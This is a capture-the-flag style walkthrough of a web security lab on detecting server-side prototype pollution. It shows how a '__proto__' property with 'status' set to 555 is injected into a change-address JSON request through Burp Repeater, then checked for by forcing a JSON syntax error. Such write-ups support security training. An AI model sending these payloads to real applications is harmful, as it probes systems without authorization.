Lab: Detecting server side prototype pollution without polluted property reflection

Study the address change feature

After starting the exercise, the store should look similar to the following illustration.

First we log in to the store with our credentials wiener:peter. To do this, we click on the My account link and fill out the registration form.

After successful registration, we have access to our billing and delivery address. Here we change the content of the Line 1 text field from Vienna HQ to Hacker and Victim Inc.. Click on the Submit button to send the form.

In the next step, we switch to the Burp Proxy and open the HTTP history there. In the HTTP history we search for the request POST /my-account/change-address.

We see that when the form is sent, the data from the fields is sent to the server as JSON. The server responds with a JSON object, which represents our user. We send this request to the Burp Repeater. We use the key combination CTRL+R for this.

In Burp Repeater, we add a new property to the existing JSON. To do this, we use the following property:

"__proto__": { 
	"foo":"bar"
}

The JSON in our request should now have the following appearance:

{
	"address_line_1":"Hacker and Victim Inc.",
	"address_line_2":"One Wiener Way",
	"city":"Wienerville",
	"postcode":"BU1 1RP",
	"country":"UK",
	"sessionId":"o3w1BQQd0tqfIEcVe9l8hVUzTz3VzxVO",
	"__proto__": { 
		"foo":"bar"
	}
}

We now send the request to the application and see in the response that our property is not reflected.

Identify a prototype pollution source

We now modify the JSON in our request so that we cause a syntax error. To do this, we simply remove a comma after any property.

After sending the request, we receive a response with an error message containing a JSON error object. If we take a closer look at the response, we see that the response is a HTTP/2 500 Internal Server Error, but in the JSON object we see the status code 400.

Back to our request, here we first undo the error that led to the syntax error. In this example, the missing comma is set again. Then we adjust the property we inserted by changing foo to status and bar to 555. The number 555 is an HTTP status code, if you assign a different number, make sure that it is in the range from 400 to 599. These two ranges are reserved for client and server errors. Your request should now look like this:

After sending, we see that our response is again a HTTP/2 200 OK, in which we see our user object. We now remove the comma again to cause another syntax error. If you have used a different error, feel free to use this one.

If we send the request to the application, then we have successfully completed the exercise. Unfortunately there is a discrepancy, actually the "status": "555" should appear in our response, but here we see "status":500.

Nevertheless, we successfully completed the exercise.

Video Solution

PreviousLab: Privilege escalation via server side prototype pollution NextLab: Bypassing flawed input filters for server side prototype pollution

Last updated 7 days ago